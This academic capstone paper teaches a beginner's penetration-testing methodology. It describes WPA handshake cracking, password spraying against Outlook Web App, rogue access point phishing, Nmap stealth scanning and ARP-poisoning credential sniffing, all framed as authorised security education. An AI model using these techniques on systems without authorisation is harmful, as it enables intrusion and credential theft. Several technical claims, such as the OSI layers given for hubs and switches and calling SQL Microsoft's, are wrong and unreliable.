ABSTRACT · Web view2020. 2. 2. · Penetration Testing Methodologies. In the realm of...
Transcript of ABSTRACT · Web view2020. 2. 2. · Penetration Testing Methodologies. In the realm of...
Penetration Testing Methodologies
by
Mathew Stuart
A Capstone Project Submitted to the Faculty of
Utica College
December 2019
in Partial Fulfillment of the Requirements for the Degree of
Master of Science in Cybersecurity
© Copyright 2019 by Mathew Stuart
All Rights Reserved
ii
Abstract
Given the rising trend in security breaches among organization’s worldwide,
cybersecurity has increasingly become an important role in the public and private industry
sectors. In addition, the cybersecurity workforce gap has left many organizations without
qualified professionals to secure their data. There is a growing need to educate and employ
cybersecurity professionals in both commercial organizations and government.
The main barriers to beginning a career in cybersecurity are gaining advanced and
relevant knowledge and experience in cybersecurity. Knowledge can be difficult and time
consuming to obtain, and training can cost money. Because of the barriers to beginning a career
in cybersecurity, a single source of information that leads to knowledge and experience in
cybersecurity is valuable.
The purpose of this research was to develop a cybersecurity penetration testing
methodology template for use by aspiring cybersecurity professionals to practice penetration
testing and develop a personalized methodology. What are the common penetration testing tools
and methods for attacking a network or environment from the Internet? What are the common
penetration testing tools and methods for attacking a network or environment from the Intranet?
What are the common penetration testing tools and methods for attacking web applications? This
research is important because penetration testing experience leads to advanced knowledge in
cybersecurity, which is an advantage when beginning a career in cybersecurity. Understanding
cybersecurity concepts through a security analysis provides a tester with conceptual knowledge
and hands-on experience. Through the process of developing a penetration testing methodology,
an aspiring cybersecurity professional will learn about cybersecurity tools, technologies and
procedures. iii
Acknowledgments
My first acknowledgment is to Professors Krystina Horvath and Anna Ragno for their
guidance and assistance throughout this project. Their feedback has been valuable and
educational throughout this project. I would also like to thank family, especially my wife and
mother, for all their support throughout these past 7 years as I worked and went to school at the
same time. If not for their support and encouragement, I may not have reached this point in my
education and career. I would also like to thank Utica College for providing the technical and
hands-on education that I was searching for. I learned a great deal from every course, and I was
able to utilize that knowledge to gain employment in the cybersecurity industry. Lastly, I would
like to thank Michael Denny for taking the time to lend his experience and expertise and be the
second reader of this paper.
iv
Table of Contents
List of Illustrative Materials...........................................................................................................viStatement of the Problem.................................................................................................................1Literature Review............................................................................................................................7
Introduction to Penetration Testing.............................................................................................7Intelligence Gathering.................................................................................................................9Wireless Networks.....................................................................................................................10Web Application Testing...........................................................................................................14Intranet.......................................................................................................................................18
Scanning and discovery.........................................................................................................18Exploitation and gaining access.............................................................................................22Persistence and spreading......................................................................................................25Data gathering and extraction................................................................................................29Covering tracks......................................................................................................................31
Discussion of the Findings.............................................................................................................32Wireless Tool Benefits..............................................................................................................33Web Application Testing Results..............................................................................................33Intranet Security Testing Results...............................................................................................36Commonalities...........................................................................................................................44
Conclusion.....................................................................................................................................46References......................................................................................................................................49Appendix A....................................................................................................................................55Appendix B....................................................................................................................................57
v
List of Illustrative Materials
Figure 7. Nikto Command and Output From a Generic Scan.......................................................34Figure 8. ZAP Automated Scan Configuration Screen.................................................................35Figure 9. ZAP Automated Scan Results........................................................................................35Figure 10. Nmap device enumeration command..........................................................................37Figure 11. How to Start a Scan in OpenVAS................................................................................38Figure 12. Results From OpenVAS Scan......................................................................................39Figure 13 - Enum4linux LDAP Output.........................................................................................40Figure 14. Enum4linux Users Output...........................................................................................41Figure 15. Enum4linux Password Policy Output..........................................................................42Table 1 - Example of Basic Nmap Command Options.................................................................55Table 2 - Nmap Stealth Scanning Options....................................................................................55Figure 1. Nikto Options 1..............................................................................................................57Figure 2. Nikto Options 2..............................................................................................................58Figure 3. ARP Poisoning Before and After...................................................................................59Figure 4. Enum4Linux Help Page Output.....................................................................................60Figure 5. Syntax for Metasaploit...................................................................................................61Figure 6. Spear Phishing Model: Targeted Cyber Attack.............................................................62
vi
Statement of the Problem
Penetration Testing Methodologies
In the realm of cybersecurity, there are two main roles; red team and blue team. Blue
teams are the teams of cybersecurity professionals who defend an environment from
compromise. In the event of a compromise, the blue team responds to those incidences for the
purposes of both minimizing the degree of compromise and gaining knowledge regarding the
attack. Blue teams also use data gathered about an attacker for investigations by either their
organization and/or law enforcement.
A red team is a team of cybersecurity professionals whose purpose is to attack an
organization’s environment for the purpose of authorized security testing, audit and analysis. Red
teams only perform offensive actions at the request of those who they are testing, therefore,
offensive testing is always agreed upon beforehand, with strict rules for the teams to follow.
These rules include a list of acceptable and unacceptable actions, and the scope in which the
attack will be conducted (NIST, 2019).
A blue team member or member on the defensive side of cybersecurity needs to know
more than just how to utilize tools to defend a network. A well-rounded security professional
also needs to understand how to perform offensive operations. It is imperative that cybersecurity
professionals understand how an attacker can penetrate an environment, which will inform the
cybersecurity professional how to defend against these types of attacks (NIST, 2019).
Penetration testing (Pentesting) can help test the blue team’s incident response skills and
methods. A penetration test also helps a blue team identify an organization’s vulnerabilities, and
allows the blue team to make modifications to systems and processes. The process of penetration
testing also promotes a proactive approach to blue teaming. If a blue team knows that an 1
environment will be the target of a pentest, they are likely to perform their own ad-hoc
penetration test to identify and remediate vulnerabilities ahead of time. This is often the case
when penetration tests are required for regulation and compliance purposes (Sanabria, 2018).
According to the Offensive Security organization, offense is the best defense. The only
way to be confident that risk mitigation strategies protecting a company against cyber-attacks
will be effective is through simulation, or pro-actively testing security measures before a real
intruder does. By encouraging students to put themselves in the shoes of a hacker by utilizing the
same tools and techniques, Offensive Security is leveling the playing field for defenders
(Offensive Security, 2019).
In order to secure an environment, it is critical that a cybersecurity professional
understand how a potential attacker would attempt to penetrate an organization’s environment.
The need for offensive security knowledge grows as the number of successful cyber-attacks
increase each year. The number of successful security breaches in the U.S. for 2016 was 1,091,
which was 40% more than the 780 breaches in 2015. Similarly, there were 1,579 data breaches in
the United States in 2017, which was a 44.7% increase from 2016 (Identity Theft Resource
Center, 2018).
The shock of data breach frequency is compounded by the average cost of a data breach
in the United States. IBM’s report on data breaches states that the average cost of a data breach
in the United States is $8.19 million per breach (IBM, 2019). With the risk of an organization
losing millions of dollars, and the possibility of millions more in lost revenue due to a damaged
reputation as the result of a data breach, organizations are on the lookout for qualified
cybersecurity professionals to protect their environments.
2
There is currently a severe shortage of qualified cybersecurity professionals worldwide.
A study conducted by Cybersecurity Ventures states “A 2016 skills gap analysis from ISACA
estimated a global shortage of 2 million cybersecurity professionals by 2019 (a half-million more
than Symantec’s prior estimate), according to the United Kingdom House of Lords Digital Skills
Committee” (Morgan, 2017). In the United States, there was a shortage of about 314,000
cybersecurity professionals as of January 2019 (Crumpler & Lewis, 2019). The data breach
frequency, costs to an organization per data breach, and the large cybersecurity professional’s
workforce gap all outline the need for more cybersecurity professionals. An increase in
cybersecurity professionals to fill the workforce gap will also increase the security posture of
organizations in the United States and around the world.
One of the questions regarding the cybersecurity professional’s workforce gap is why the
gap exists in the first place. The International Information Systems Security Certification
Consortium, also known as ISC2, performed a study in 2018 regarding the mentioned workforce
gap and it showed that “Despite [cybersecurity] professionals looking to shift priorities, as well
as other concerns and challenges, 68% of respondents say they are somewhat or very satisfied
with their jobs” (International Information Systems Security Certification Consortium, 2018).
With most cybersecurity professionals satisfied with their jobs, the question remains as to
why more people are not filling the workforce gap. The International Information Systems
Security Certification Consortium (ISC2) also investigated this issue. According to ISC2’s
survey, 34% of people surveyed do not know which career path opportunities lead to a role in
cybersecurity, 32% of organizations do not know about cybersecurity skills, and the same
percentage of people surveyed cannot afford certification training and/or the certifications
themselves. Twenty-eight percent of people surveyed cannot afford the formal education to 3
prepare them for a career in cybersecurity, and 26% of people surveyed said they do not have
enough experience in cybersecurity to get a job in the industry. This is a problem because 49% of
organizations surveyed in the same survey stated that the most important qualification for
employment is relevant cybersecurity work experience, while 40% of organizations stated that
extensive cybersecurity work experience is the most important qualification for employment
(International Information Systems Security Certification Consortium, 2018). It is difficult to
begin working in the cybersecurity industry if one does not have prior cybersecurity experience.
Between the time it takes to learn cybersecurity skills, the costs of training, and the
requirement for prior cybersecurity experience, it is not surprising that there is such a large
workforce gap. The lack of quality, open-source training materials that cover the steps needed to
learn cybersecurity, specifically offensive security, is the main issue. Offensive security is so
important because the previously mentioned ISC2 survey reported that 47% of organizations
named advanced cybersecurity concepts as the most important qualification for employment.
Another 40% believe relevant cybersecurity experience is the most important factor for
employment, meaning that 87% of organizations require prior experience for employment
(International Information Systems Security Certification Consortium, 2018).
Offensive security knowledge falls under advanced cybersecurity concepts and relevant
cybersecurity knowledge, making penetration testing and red team skills the most coveted skill
set. Gaining knowledge and experience in the cybersecurity field can occur at home during a
person’s spare time. There are ways of creating home cybersecurity testing labs that allow a
person to test and practice what they learn. In one example, a cybersecurity student, Vitaly Ford,
posted instructions on how to create such a lab environment using virtual machines. Ford’s blog
post also provides links to resources like virtual machine images that can easily be used with 4
virtual machine hosting software, also known as a hypervisor. An example of a hypervisor is
VirtualBox. Ford’s directions on first steps are to:
learn how to install a virtual machine (and a hypervisor), which is typically performed in
Microsoft Hyper-V, Oracle VirtualBox, or VMWare Workstation/Fusion. In addition, one can
begin thinking about developing a networking diagram that will help a pentester stay on track
once the pentester installs virtual machines and connects them together (Ford, 2017).
Ford’s steps are one option, among several, to gain hand-on experience and cybersecurity
knowledge. Hands-on penetration testing experience is possible through the utilization of
penetration testing environments provided by the hosts of hackthebox.eu. If a user can gain
credentials and create an account in hackthebox.eu, that user is able to utilize the OpenVPN
config file for their Hack the Box account, which accesses a testing network. This would allow
the user to perform attacks against pre-setup machines in the environment and, thus, test what
was learned in regard to penetration testing. “Hack the Box is an online platform allowing you to
test your penetration testing skills and exchange ideas and methodologies with thousands of
people in the security field” (Hack the Box, 2019). The pre-setup machines in Hack the Box’s
environment range in difficulty gaining user and root credentials. Once a tester gains one or both
credentials, they submit the credentials to Hack the Box, who gives points for correct credentials.
Practicing penetration testing with the easier machines is often a good start and a great learning
experience.
This paper addresses the lack of penetration testing methodology templates that
beginners in the field of cybersecurity should utilize to develop a personalized penetration testing
method that works best for them. There is a lack of cybersecurity learning materials available for
new professionals that overview how to use different tools and how to utilize tools at each step 5
of a penetration test. In search of advanced cybersecurity conceptual knowledge, the main
barriers to entering the cybersecurity field are time, money and a lack of cybersecurity
experience. A penetration testing template would assist an information technology professional
gain cybersecurity knowledge and experience.
For those with little to no cybersecurity experience, who wish to perform penetration
tests, tend to research multiple online sources in order to gain the knowledge they need. Instead,
there should be a single template for penetration testing best practices with tool syntax and
examples which provide a starting point for beginners to develop their own pentesting
methodology.
This paper begins the journey of gaining penetration testing knowledge and experience
for those who wish to learn how a pentest is performed from beginning to end. It also includes
steps on how to discover hosts, find vulnerabilities, exploit example vulnerabilities, maintain
persistence on a machine, exfiltrate data and erase evidence of an attack to cover the attacker’s
tracks. The mentioned penetration testing steps include syntax for the tools covered in this paper,
and best practices on how to use those tools.
The purpose of this research is to review different penetration testing methodologies and
to discuss the advantages and disadvantages of each methodology in order provide a best practice
method for attacking networks. The networks and environments that will be explored are the
Intranet, Internet and web applications. This will focus on information at a beginner’s level, thus
creating a template that can be used as a baseline for creating a more advanced and personalized
methodology as a user’s skills and knowledge increase over time and through practice.
In order to provide best practices, the following questions will be answered; what are the
common penetration testing tools and methods for attacking a network or environment from the 6
Internet? What are the common penetration testing tools and methods for attacking a network or
environment from Intranet? What are the common penetration testing tools and methods for
attacking web applications?
Literature Review
Introduction to Penetration Testing
There are three different types of penetration tests, Black Box, White Box, and Grey
Box. The type of penetration test that is performed depends on the amount of information is
provided to the tester before testing begins. Black Box testing is conducted when the tester is
given no information about an organization’s network or code. White Box testing is when the
tester is given full knowledge of an orgaization’s network or source code. Grey Box testing is a
combination of White and Black Box testing, meaning that the tester has a limited knowledge of
the network or source code (Khan & Khan, 2012). The seven main phases of a penetration test
are as follows:
• Discovery
• Enumeration/Info Gathering
• Exploitation
• Privilege escalation
• Persistence/Maintaining Access
• Covering Tracks
• Documentation/Reporting
(Ali, Allen, & Heriyanto, 2014, pp. 60-66).
In the book Advanced Penetration Testing for Highly-Secured Environments (2016), the
authors explain the Penetration Testing Execution Standard (PTES) and outline the standard’s
7
structure. The seven sections of the PTES are pre-engagement interactions, intelligence
gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.
The PTES explanation does not include a technical guide for the standard, but it does reference
the URL http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines, which is a
technical guide for the PTES. In the PTES technical guideline, the steps are broken down into
smaller steps with technical information, but the core of the guideline is the same as the
guideline found in Advanced Penetration Testing for Highly-Secured Environments (2016)
(Allen & Cardwell, 2016, p. 11).
Standards in penetration testing are often vague, general and procedural in nature, as
opposed to being technical, which provides specific details. A commonality throughout
penetration testing is the use of tools and toolsets to perform those tests. Open-source tools are
most often used to perform penetration tests. Penetration testers use stand-alone tools and
toolsets. These toolsets are chosen by their effectiveness and the tester’s familiarity with the tool.
If the tester is not familiar with their tools, the test will not be effective. There are many open-
source and paid tools, but testers need to choose their toolsets to fit the needs of the test. As an
example, in an application security test, Aircrack-ng would not normally be necessary because
Aircrack-ng was made for wireless network testing and the test is performed on a software’s
security and not the security of the network. The same could be said if the situation was reversed
where a static code analyzer would not be required for a network penetration test. Ensuring the
toolset matches the test and the penetration tester is familiar with their toolset is easily the most
important aspect of a penetration test (Velu, 2017, pp. 201-206).
8
Intelligence Gathering
The discovery phase begins with intelligence gathering and the discovery of devices that
could be compromised. The three intelligence gathering methodologies are open source
intelligence (OSINT), cyber intelligence (CYBINT) and human intelligence (HUMINT). Cyber
intelligence involves finding information about the target on the Internet, which is a subset of
open source intelligence. This means finding intelligence via an open source tool or platform.
Another intelligence gathering location is online social networks (OSNs). OSNs are part of
CYBINT, and for good reason as OSNs commonly have a wealth of data on individuals within a
company and on the organization itself (Sood & Enbody, 2014, pp. 23-34).
Human intelligence occurs when an attacker acquires information about the target by
analyzing responses from people through direct interaction. This can include phishing emails or
physically posing as someone else to trick the target into providing the attacker information.
These practices are also known as social engineering (Sood & Enbody, 2014).
Social media has changed open source intelligence in a profound way. Through OSN,
intelligence on both individuals and organizations is discoverable through social media accounts
such as Facebook, YouTube, Instagram, Snapchat, and Twitter. When reviewing the target’s
social media posts, it is possible to gather the target’s location during certain times of day, friend
lists, liked pages, and group associations. The information gathered during OSN provides the
attacker with an overview of what the target likes and what kind of information they are most
receptive to. This can give an attacker the information needed to manipulate a user through social
engineering as part of an attack against the specific user or an organization (Bahybars-Hawks,
2015, pp. 155-172).
9
OSINT also includes discovering publicly facing devices of a target organization. This
could include website, Internet accessible servers and/or Internet accessible networking
equipment. Target discovery phase mostly entails identifying the status of a target’s network,
operating system (OS), and mapping out the organization’s information technology
infrastructure. This provides the penetration tester with a better understanding of the
technologies or devices used within an organization and may further help the tester in
enumerating services. By utilizing tools in Kali Linux, the tester can determine what hosts are
live on a network, which operating systems are running on the local hosts, and will be able to
characterize each device according to its role. The tools in Kali Linux often utilize active and
passive detection techniques in addition to network protocols where they can be manipulated in
various ways to gather information from the OS and running services (Ali, Allen, & Heriyanto,
2014, pp. 82-83).
There are several sources for gaining syntax for certain tools. Online cheat sheets and
user guides are a great way to gain a basic understanding of a tool’s syntax and uses.
Wireless Networks
When a penetration test involves compromising a wireless network, it can end up being
the key to compromising an entire company. Some tools and toolsets in Kali Linux are useful
when attempting to test a wireless network’s security. Two of the most widely used toolsets are
Aircrack-ng and Kismet.
Kismet can be used as a wireless detector, sniffer, and intrusion detection system. Kismet
can detect and sniff the name of the wireless network along with its broadcast ID (BSSID), the
channel it is broadcasting on, the MAC address of the wireless access point (WAP), and the
MAC address clients use to connect to the wireless network. Kismet supports some plugins that
10
expand the wireless protocols that can be sniffed (Beggs, 2017, pp. 206-207). It can also sniff the
other Institute of Electrical and Electronics Engineers (IEEE) Wi-Fi standards 802.11a, 802.11b,
802.11g, and 802.11n traffic. These different IEEE 802.11 standards are wireless local area
network (WLAN) standards that, among other features, denotes the speed and security of
wireless traffic. The latest IEEE standard for wireless networks is 802.11ay, which allows a
possible 20 gigabits per second download and upload speed (IEEE, 2019).
Kismet performs reconnaissance by placing the attacker’s wireless network interface card
(WNIC) in promiscuous mode and activating Kismet, which will capture packets transmitted
over the air and discover the different SSIDs in the area, along with cell towers for mobile data
traveling through the air. The information gathered by Kismet is useful in different ways. For
example, knowing the wireless security protocol will allow the attacker to determine the
appropriate decryption module in Aircrack-ng to extract authentication information. Knowing
the MAC address allows the attacker to attempt to perform different types of attacks. For
example, a tester can perform an Omerta attack if the wireless access point (WAP) is an
unpatched Aruba WAP. Kismet obtains a variety of information when sniffing the 802.11
standard spectrum (Beggs, 2017, pp. 206-207). “Omerta is an 802.11 DoS tool that sends
disassociation frames to all stations on a channel in response to data frames. The Omerta attack
is characterized by disassociation frames with a reason code of 0x01” (Aruba Networks, 2019).
Authentication information that a wireless network uses allows a security tester to find
any weak authentication protocols used, and depending on the protocols, there may be known
vulnerabilities and possible exploits.
Another well-known open-source wireless security tool is Aircrack-ng. The
toolset specializes in wireless security testing and is comprised of an array of tools that can 11
perform most any task required during a wireless security penetration test. The following is a list
of each tool in the Aircrack-ng tool suite and their uses:
• Airbase-ng – used for rogue access point creation
• Aircrack-ng – a cracking and recovery tool for WEP and WPA/WPA2 keys.
• Airdecap-ng – decryption for WEP and WPA/WPA2 wireless traffic.
• Airdecloak-ng - Used for bypassing WEP cloaking which is a WEP method for
fooling WEP cracking tools.
• Aireplay-ng – Creates wireless traffic for attacks.
• Airmon-ng – places the WNIC into promiscuous mode to view all traffic
• Airodump-ng: Used for 802.11 protocol monitoring and sniffing.
• Airodump-ng-oui-update: Updates the Organizationally Unique Identifier (OUI)
database.
• Airolib-ng – Maintains a local database of ESSIDs, passphrases and precomputed
PMKs to use in cracking
• Airserv-ng – Sets up a local server to allow other devices to access the wireless
network
• Airtun-ng – Creates virtual tunnel interfaces.
• Besside-ng – An automated WEP and WPA attacking tool for cracking all WEP-
protected networks that the WNIC can see. It also records all the WPA-
handshakes.
• Easside-ng – Sets up communication via a virtual WEP-protected AP without a
WEP-key.
• Packetforge-ng – Can create fake wireless network packets for other attacks.12
• Tkiptun-ng – Can inject a few frames into a WPA TKIP network with quality of
service (QoS)
(Fadyushin & Popov, 2016, pp. 154-159).
Penetration testers can crack a Wi-Fi protected access 2 (WPA2) key using Airmon-ng to
place the interface into promiscuous mode so that the interface can view all packets traveling
through the air. The next step is to use Airodump-ng to take that captured data and “dump” it
into a table. The Airplay-ng tool forces de-authentication of a wireless client, which forces the
target to re-authenticate to the WAP. This allows Airodump-ng to capture the WPA handshake
as it travels over the air. Aircrack-ng decrypts and recovers the key, which authenticates the
tester to the wireless network (Fadyushin & Popov, 2016, pp. 154-159).
Decryption is part of most penetration testing processes. Wireless network handshakes
are one example, and captured passwords from compromised machines are examples where
decryption is necessary. There are several types of wireless network authentication methods and
security protocols.
In the password cracking section of the PTES, it mentions how to crack passwords for
different wireless security protocols. WPA-PSK can be used to brute-force the password to the
SSID. WPA is an acronym for Wi-Fi Protected Access and PSK stands for Pre-Shared Key. In
order to accomplish a successful decryption is to use a tool, such as Wireshark or Airodump-ng,
the authentication handshake between a client and the WAP must be captured. The next step is to
decrypt the authentication handshake, which reveals the password. The Penetration Testing
Standard mentions that the Aircrack-ng tool suite is made specifically for this type of task and is
a standard in open source tools for cracking wireless authentication encryption (Pentest-
Standard, 2012).13
Regarding password cracking, John the Ripper (JTR) is an open source tool that cracks
hashes to reveal passwords. JTR specializes in NTLM hashes but can be used for Kerberos and
other operating system hashed passwords such as Linux and Macintosh devices depending on the
version of JTR that is running. This tool can be used to decrypt WEP and WPA/WPA2
authentication that was captured over the air during a packet sniff. Hashes are cracked using
rainbow tables, which are hashed wordlists, which are then hashed several more times using
sophisticated mathematical methods. JTR uses rainbow tables to crack the captured hashes
(Fadyushin & Popov, 2016, pp. 154-159).
As mentioned previously, another way to attack a wireless network is to pose as the
wireless network itself. This is accomplished by performing a modified combination of a man-
in-the-middle and phishing attack called AP Phishing.
AP phishing, or access point phishing, is an attack that involves a rouge access point that
contains a web portal, which asks users for sensitive information. If performed correctly, the
users will not realize they are being phished. This is assuming they normally enter credentials in
a web portal to access the network. This works best when spoofing access points in public areas
such as Starbucks. Airpwn-ng, which is part of the Aircrack-ng tool suite, can perform this attack
(Fadyushin & Popov, 2016, pp. 154-159).
Web Application Testing
Referring to the Open Web Application Security Project (OWASP), the OWASP
penetration testing methodologies page of their website list reasons for performing web
application penetration tests and references the Penetration Testing Execution Standard (PTES).
OWASP also refers to the payment card industry data security standard PCI-DSS compliance
requirement for penetration testing and offers some guidance on the framework for compliance
14
testing. There is also a page that outlines the framework for NIST800-115’s Information Systems
Security Assessment Framework (ISSAF). Other methodologies outlined are the Open Source
Security Testing Methodology Manual (OSSTMM) and the FedRAMP Penetration Test
Guidance. This is important for web application penetration testing, as there is always a reason
for a test. Regulatory compliance can often be that reason. Understanding the web application
penetration testing compliance standards is critical to performing the correct test for the
organization (OWASP, 2019).
The Zed Attack Proxy (ZAP) was developed by the OWASP as an open-source tool for
the sole purpose of finding web application vulnerabilities. The tool has a variety of functions
allowing automatic and manual scanning of an application. The OWASP ZAP user guide on
Github contains an explanation for the different settings that the ZAP tool offers (Psiinon, 2015).
ZAP has multiple scan modes that can be utilized to serve different functions. As an
example, safe mode is a setting that tells the tool to refrain from any dangerous scan actions that
could hinder the performance of a web application. Protected mode is the next level up from safe
mode and allows the scan to perform only potentially dangerous scan actions against the URL in
scope. Standard mode is the default mode when a tester installs and opens the tool, and allows
the security tester to perform whichever tests they want. Lastly, attack mode tells the tool to scan
the URL once discovered, and runs all tests and attacks available against the in-scope URLs
(Psiinon, 2015).
There are several other tools available to assist a security analyst throughout the process
of performing a web application penetration test. One such tool is Nikto, which is an open source
web application scanner that looks for URL paths, index pages, HTTP server options, server OS
and web hosting software. Because the program looks at URL paths and index pages, not all the 15
information gathered are vulnerabilities. The tool also lacks stealth, so it could also be used to
test intrusion detection systems (IDS) and/or intrusion prevention systems (IPS). In Kali Linux,
the command ‘nikto -Help’ shows a list of options for scanning, format, display, configuration,
authentication, and other features that can be found in Figures 1 and 2. Figures 1 and 2 are in
Appendix B (Sullo, 2019).
A popular, effective and widely used web application security testing tool is Burp Suite,
which is a web application protocol analyzer that allows a user to intercept http and https traffic.
The tool allows for security testing by manipulating those captured packets, which contain
information about the web application. Intercepting traffic is performed by using the Burp Suite
software as a proxy for the attacker’s browser and then activating Burp Suite’s intercept mode so
that each http/s packet is displayed in HTML code and is intercepted before it gets to the browser
and again before it gets to the website (Sharma, 2017, pp. 63-71).
One use case for Burp Suite during security testing is using the captured data for a
successful and failed login POST request and using those results in conjunction with the Hydra
tool that is used for credential testing. A POST request is sent to the web application when a user
inputs information on the website and attempts to submit that information. An example of this
would be clicking login after entering a username and password into a website. The process is to
take the HTML code from Burp Suite, use it in Hydra while utilizing a username file and
password file to test credentials and check if a username and password set is successful in
authenticating. This is a faster method than manually testing usernames and passwords in the
browser (Sharma, 2017, pp. 63-71).
An outlook web application (OWA) is a popular spot to perform password spaying
attacks as OWA is often linked to a user’s domain credentials. One of the issues in performing 16
password spraying is password lockouts, which occurs when a password has been entered
incorrectly too many times and the account is locked-out. The attacker can no longer try different
passwords indefinitely. A workaround for account lockout limitations is to use one strategically
chosen password across all the accounts of an organization’s domain, thus allowing more
password attempts before locking out the account (Najera-Gutierrez & Ansari, 2018, pp. 149-
156).
Before performing the password spray, it is important to obtain the username format or
email address format of the organization, which is usually performed during OSINT and
HUMINT. When choosing the right password for a password spray against an OWA account, it
is important for the tester to understand and know common passwords. An example of a
commonly used password is the current season and the year, such as Winter2019 (Najera-
Gutierrez & Ansari, 2018, pp. 149-156). The ten-character password has uppercase, lowercase
and numbers. Most organizations only require the password to be eight characters.
In order to perform the attack, the attacker needs to visit the OWA login page to attempt
and fail a login while capturing the POST request. The captured request is then forwarded to
Burp Suite’s Intruder functionality where the attacker uses the attack type of ‘sniper’ and
specifies the type of payload they want to use. The payload is the username or email because that
is the only thing that will change during the attack since the same password will be used against
all accounts to reduce the risk of account lockouts (Najera-Gutierrez & Ansari, 2018, pp. 149-
156).
Once a password is input, the attacker must import the list of possible usernames or email
addresses that were found and/or generated during OSINT and HUMINT. Once these steps are
complete, it is time to launch the attack. In some circumstances, the tester must set Burp Suite to 17
follow URL redirects and process those URL cookies for the attack to be successful. Once the
settings and configurations are set, a successful attack can be launched. URL cookies are saved
on a user’s browser and contain information regarding the session ID, user ID and other text.
Websites use cookies to maintain a session with a browser so that the user doesn’t have to re-
authenticate as other URLs are loaded (Najera-Gutierrez & Ansari, 2018, pp. 149-156).
Databases use Microsoft’s Structured Query Language (SQL) in support of web
applications. SQL is a programming language used for database communication and queries.
Because web applications use SQL, the SQLMap tool is included in Kali Linux OS distribution
by default and is a popular tool for testing the SQL security in web applications. SQLMap
supports several versions of SQL and supports enumeration, fingerprinting, and takeover options
when vulnerabilities allow. The specifics regarding what tasks the tool can perform are listed on
its official GitHub. The range of options and capabilities that the tool offers makes it a great tool
to use during web application security testing and should be included in any penetration tester’s
tool suite (Stamparm, 2014).
Intranet
Scanning and discovery. The Internet and Intranet are two different types of networks.
The Internet is a computer communications network that connects servers and computers around
the world (Marriam-Webster, 2019). An Intranet connects computers and servers within one or
several local area networks (LANs) not accessible to the Internet without the use of an Internet
connection through an Internet Service Provider (ISP).
When a tester has access to a target organization’s Intranet, they generally can establish a
network connection to other network connected devices on that organization’s Intranet. Access
to an organization’s Intranet can occur in a couple of different ways. One way to get a network
18
connection is to establish a physical connection to the network using an ethernet cable to an
ethernet port in the office of the organization. Another way is to get wireless network access
through a connection to the wireless access point (Fadyushin & Popov, 2016, pp. 154-159).
Once the tester is on the network, discovery of devices on the network and enumeration
of those devices are the next steps in performing a penetration test. Reconnaissance, which is
part of the preparation phase where the tester gathers as much information as possible about the
target before launching an attack. During the reconnaissance phase, the tester will utilize
different intelligence to gain more knowledge about the target organization. The phase may also
involve internal and/or external network scanning (EC-Council Press, 2017, p. 9).
When a tester needs to perform discovery scanning and enumeration on a network, Nmap
is the tool of choice. There are little to no open-source tools that match the capabilities that
Nmap provides. An example of an Nmap command is; nmap -A -v -O -sC 192.168.0.16 -oG
scan.txt. The nmap portion of the command at the beginning initiates the Nmap program. The
options, such as -A, -v, -O, and -sC tell Nmap what actions to perform against the IP address or
network range. The -oG option is the output where the ‘o’ stands for output and the ‘G’ stands
for grep, which places the output in a greppable format, allowing the use of grep to search for
keywords within a file. The last portion of the output is scan.txt, which creates the text file with
that name where the output is going to go to (Lyon, 2008). Table 1, Found in Appendix A, shows
an example list of some basic Nmap options.
The mentioned examples only show syntax but not all the ways that the Nmap tool can be
used. There are examples out there that show the tool’s true diversity in a variety of scenarios.
Depending on what the tester is trying to achieve, there are multiple ways to run Nmap. To
19
perform a basic ping scan of a network or range of IP addresses, the following command can be
utilized; nmap -sP -n 10.0.0.1-254 (Lyon, 2008).
The -sP portion of the command asks Nmap to ping the IP addresses to determine if the
devices are online, and the -n tells Nmap not to attempt domain name resolution. With the small
amount of data that Nmap is required to gather during this scan, the scan will be faster. To gather
a little more data, a tester can replace -sP with -sT which will tell Nmap to scan the common
TCP ports on the devices. This is where port scanning comes into play (Lyon, 2008).
Port scanning is critical after initial discovery has been completed. As an example, if a
ping scan was performed and only one IP address was found to be online, the next step is to
perform enumeration of that device. To determine which ports are open, the -p option is used. If
the tester wants to scan the entire range of ports on the device, the option is -p-. Once the tester
knows which ports are open, they can Nmap with the -sV option which tells Nmap to determine
the version of the services running on those ports. Depending on the version of the running
services, there could be known exploitable vulnerabilities. The difficulty with Intranet scanning
is the risk of getting caught by IDS and IPS. One basic method to avoid detection is address
resolution protocol (ARP) scanning which asks the switch for the ARP table, identifying devices
on the local area network while never reaching out to those devices directly. The Nmap option
for performing an ARP scan is -PR. There are multiple ways of performing these steps in Nmap,
and there are more Nmap options available to assist in discovery and enumeration while
remaining stealthy (Lyon, 2008).
In order to avoid detection of IDS and IPS on an Intranet, an attacker needs to blend-in
with normal traffic. When scanning a network, it is important to limit the frequency of packets
sent from the tester’s computer so the scan looks more like normal traffic rather than a scan of 20
the network (Allen & Cardwell, 2016, pp. 331-344). Nmap can limit packet parameters, spoofing
source IP address, spoofing MAC address, and changing other packet parameters. Using a
combination of the Nmap options in Table 2, found in Appendix A, will assist in stealth scanning
(Beggs, 2017, pp. 66-72).
Depending on the situation, poisoning the ARP table is a viable option to perform certain
attacks that give the penetration tester information that can be utilized to compromise a system or
network. The tool, Cain and Abel, can perform ARP poisoning after the pentester has placed
their NIC or WNIC in promiscuous mode and obtained a list of the devices from sniffing all the
traffic on the network. After obtaining the list of devices, the tester can then determine which
host they want to impersonate and is able to filter the sniffing tool to show only that device’s
traffic. The Cain and Abel tool performs a man-in-the-middle attack by sending the victim
machine an ARP request with the IP address of the default gateway, and then an ARP request to
the default gateway with the IP address of the victim machine. At this point, the victim machine
thinks the pentester is the default gateway and the default gateway thinks the penetration tester is
the victim machine. Cain and Abel will capture the packets and analyze the packets for
credentials, PII, and other sensitive information can begin (Sanders, 2017, pp. 28-30). Figure 3,
found in Appendix B, shows a graphical representation of an ARP table before and after ARP
poisoning.
Another popular packet sniffing tool is Wireshark. When trying to sniff a network, it is
best to be on a hub network instead of a switched network because a hub operates on the second
layer of the OSI model. In turn, it will broadcast all packets through all ports all the time, which
makes sniffing a network much easier. A switch operates on the third layer of the OSI model and
will only send packets out of the ports based on the IP and MAC addresses in the ARP table. 21
Poisoning the ARP table by initiating a separate independent network connection and spoofing
the MAC of the default gateway to the switch will allow a penetration tester to imitate a hub
network by forcing all the other devices on the LAN to go through the tester’s computer in order
to leave the LAN. When this happens, Wireshark can act as a proxy by routing packets to and
from the rest of the Intranet and the victim machines. As Wireshark routes packets, it is also
capturing those packets. Just like Cain and Abel, Wireshark can analyze the packets offline for
credentials, keys, and any other sensitive information (Ali, Allen, & Heriyanto, 2014, pp. 323-
327).
